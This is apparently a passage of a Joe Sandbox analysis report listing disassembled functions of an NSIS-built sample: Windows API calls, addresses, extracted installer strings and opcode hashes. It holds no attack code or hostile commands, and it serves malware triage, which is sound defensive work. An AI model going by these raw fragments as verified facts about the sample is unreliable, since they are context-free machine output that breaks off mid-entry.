                                                                                                              • Source File: 00000005.00000002.2537992846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2537953721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538055109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538148806.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538203550.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                              • String ID: (7B$A
                                                                                                              • API String ID: 2624150263-3645020878
                                                                                                              • Opcode ID: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
                                                                                                              • Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
                                                                                                              • Opcode Fuzzy Hash: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
                                                                                                              • Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D
                                                                                                              APIs
                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061CF,?,?), ref: 0040606F
                                                                                                              • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078
                                                                                                                • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                                • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                              • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
                                                                                                              • wsprintfA.USER32 ref: 004060B3
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060EE
                                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
                                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
                                                                                                              • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 0040619C
                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3
                                                                                                                • Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
                                                                                                                • Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537992846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2537953721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538055109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538148806.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538203550.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                              • String ID: %ls=%ls$[Rename]
                                                                                                              • API String ID: 2171350718-461813615
                                                                                                              • Opcode ID: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
                                                                                                              • Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
                                                                                                              • Opcode Fuzzy Hash: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
                                                                                                              • Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD
                                                                                                              APIs
                                                                                                              • GetTickCount.KERNEL32 ref: 00402F44
                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400), ref: 00402F60
                                                                                                                • Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
                                                                                                                • Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,00438800,00438800,80000000,00000003), ref: 00402FA9
                                                                                                              • GlobalAlloc.KERNEL32(00000040,0040A230), ref: 004030F0
                                                                                                              Strings
                                                                                                              • Null, xrefs: 00403029
                                                                                                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403139
                                                                                                              • Error launching installer, xrefs: 00402F80
                                                                                                              • soft, xrefs: 00403020
                                                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403187
                                                                                                              • Inst, xrefs: 00403017
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537992846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2537953721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538055109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538148806.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538203550.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                              • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                              • API String ID: 2803837635-787788815
                                                                                                              • Opcode ID: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
                                                                                                              • Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
                                                                                                              • Opcode Fuzzy Hash: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
                                                                                                              • Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD
                                                                                                              APIs
                                                                                                              • GetSystemDirectoryW.KERNEL32(004281E0,00000400), ref: 0040654B
                                                                                                              • GetWindowsDirectoryW.KERNEL32(004281E0,00000400,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
                                                                                                              • SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
                                                                                                              • SHGetPathFromIDListW.SHELL32(00000000,004281E0), ref: 004065A8
                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 004065B3
                                                                                                              • lstrcatW.KERNEL32(004281E0,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
                                                                                                              • lstrlenW.KERNEL32(004281E0,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631
                                                                                                              Strings
                                                                                                              • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004065D3
                                                                                                              • Software\Microsoft\Windows\CurrentVersion, xrefs: 0040651B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537992846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2537953721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538055109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538148806.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538203550.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                              • API String ID: 717251189-730719616
                                                                                                              • Opcode ID: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
                                                                                                              • Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
                                                                                                              • Opcode Fuzzy Hash: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
                                                                                                              • Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D
                                                                                                              APIs
                                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 004043E3
                                                                                                              • GetSysColor.USER32(00000000), ref: 00404421
                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 0040442D
                                                                                                              • SetBkMode.GDI32(?,?), ref: 00404439
                                                                                                              • GetSysColor.USER32(?), ref: 0040444C
                                                                                                              • SetBkColor.GDI32(?,?), ref: 0040445C
                                                                                                              • DeleteObject.GDI32(?), ref: 00404476
                                                                                                              • CreateBrushIndirect.GDI32(?), ref: 00404480
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537992846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2537953721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538055109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538148806.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538203550.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 2320649405-0
                                                                                                              • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                              • Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
                                                                                                              • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                              • Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54
                                                                                                              APIs
                                                                                                              • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                                                                • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FD5
                                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537992846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2537953721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538055109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538148806.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538203550.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                              • String ID: 9
                                                                                                              • API String ID: 163830602-2366072709
                                                                                                              • Opcode ID: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
                                                                                                              • Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
                                                                                                              • Opcode Fuzzy Hash: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
                                                                                                              • Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59
                                                                                                              APIs
                                                                                                              • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                              • lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                              • lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                              • SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537992846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2537953721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538055109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538148806.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538203550.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                              • String ID:
                                                                                                              • API String ID: 2531174081-0
                                                                                                              • Opcode ID: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
                                                                                                              • Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
                                                                                                              • Opcode Fuzzy Hash: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
                                                                                                              • Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8
                                                                                                              APIs
                                                                                                              • DestroyWindow.USER32(?,00000000), ref: 00402EA9
                                                                                                              • GetTickCount.KERNEL32 ref: 00402EC7
                                                                                                              • wsprintfW.USER32 ref: 00402EF5
                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                                • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                              • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
                                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00402F27
                                                                                                                • Part of subcall function 00402E72: MulDiv.KERNEL32(?,00000064,?), ref: 00402E87
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537992846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2537953721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538055109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538148806.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538203550.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                              • String ID: ... %d%%
                                                                                                              • API String ID: 722711167-2449383134
                                                                                                              • Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                              • Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
                                                                                                              • Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                              • Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
                                                                                                              • GetMessagePos.USER32 ref: 00404D3D
                                                                                                              • ScreenToClient.USER32(?,?), ref: 00404D57
                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
                                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537992846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2537953721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538055109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538148806.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538203550.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                              • String ID: f
                                                                                                              • API String ID: 41195575-1993550816
                                                                                                              • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                              • Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
                                                                                                              • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                              • Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4
                                                                                                              APIs
                                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                              • wsprintfW.USER32 ref: 004067A4
                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537992846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2537953721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538055109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538148806.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538203550.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                              • String ID: %s%S.dll$UXTHEME$\
                                                                                                              • API String ID: 2200240437-1946221925
                                                                                                              • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                              • Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
                                                                                                              • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                              • Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798
                                                                                                              APIs
                                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                                              • wsprintfW.USER32 ref: 00402E45
                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00402E55
                                                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537992846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2537953721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538055109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538148806.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538203550.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                                              • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                              • API String ID: 1451636040-1158693248
                                                                                                              • Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                              • Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
                                                                                                              • Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                              • Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99
                                                                                                              APIs
                                                                                                              • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                              • wsprintfW.USER32 ref: 00404CB6
                                                                                                              • SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537992846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2537953721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538055109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538148806.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538203550.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                                              • String ID: %u.%u%s%s$(7B
                                                                                                              • API String ID: 3540041739-1320723960
                                                                                                              • Opcode ID: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
                                                                                                              • Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
                                                                                                              • Opcode Fuzzy Hash: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
                                                                                                              • Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8
                                                                                                              APIs
                                                                                                              • CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,774D3420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                              • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                              • CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,774D3420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                              • CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,774D3420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537992846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2537953721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538055109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538148806.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538203550.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Char$Next$Prev
                                                                                                              • String ID: *?|<>/":
                                                                                                              • API String ID: 589700163-165019052
                                                                                                              • Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                              • Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
                                                                                                              • Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                              • Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD
                                                                                                              APIs
                                                                                                              • lstrcatW.KERNEL32(00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017B0
                                                                                                              • CompareFileTime.KERNEL32(-00000014,?,0040A5D8,0040A5D8,00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017D5
                                                                                                                • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                                • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                              Memory Dump Source
